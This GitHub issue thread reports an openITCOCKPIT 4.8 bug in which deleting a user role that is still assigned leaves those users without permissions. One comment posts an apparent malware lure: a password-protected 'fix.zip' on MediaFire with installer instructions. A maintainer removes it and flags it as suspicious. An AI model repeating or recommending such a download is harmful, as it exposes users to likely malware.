### ISSUE TITLE
User Role can be removed even when still associated on a user

### ISSUE THREAD

**Issue by kbilev** [it-novum/openITCOCKPIT#1707]
**Describe the bug**
User roles can be removed without a check if the removed role is still associated on a user

**To Reproduce**
1. Create User Role
2. Associate to an User
3. Delete User Role
4. User is not shown anymore in the users list and has no permissions anymore

**Expected behavior**
Check if the user role is safe to be removed

**Versions**
* openITCOCKPIT Server Version: 4.8

**Additional context**
fix possible by changing the usergroup_id in the users table

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nook24** [comment]
@ZiQiangZhou I have removed your zip file. If you want to share code, send a pull request or past the changes into an code block in the issue like so
```php

<?php
echo "Hallo Welt";
```

Do not upload random zip files - that's sus as hell.

**Comment by Arescyn1** [comment]
He's spamming that on a bunch of repos

**Comment by nook24** [comment]
Tracked by ITC-3361
